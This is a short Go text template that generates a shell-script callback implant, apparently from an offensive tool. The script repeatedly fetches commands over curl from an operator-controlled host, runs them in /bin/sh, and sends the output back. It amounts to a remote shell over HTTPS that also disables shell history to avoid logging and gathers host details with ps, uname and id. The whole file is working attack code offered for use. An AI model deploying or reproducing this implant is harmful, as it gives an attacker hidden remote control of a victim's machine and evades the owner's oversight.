{{- /*
     * callback.tmpl
     * Jazzed-up callback template
     * By J. Stuart McMurray
     * Created 20240325
     * Last Modified 20240601
     */ -}}
{{- define "curl" -}}
curl -Nsk --pinnedpubkey "sha256//{{.PubkeyFP}}" https://{{.URL}}
{{- end -}}
#!/bin/sh

CRS_FUNCS='
trap - HUP
export HISTFILE=/dev/null
m4_esyscmd(`cat')m4_dnl
ps awwwfux; uname -a; id
'

(
	trap "$CRS_FUNCS" HUP
	trap
	echo 'kill -HUP $$'
	{{template "curl" .}}/i/{{.ID}}
) </dev/null 2>&0 |
/bin/sh 2>&1 |
{{template "curl" .}}/o/{{.ID}} -T- >/dev/null 2>&1
{{/* vim: set filetype=gotexttmpl noexpandtab smartindent: */ -}}
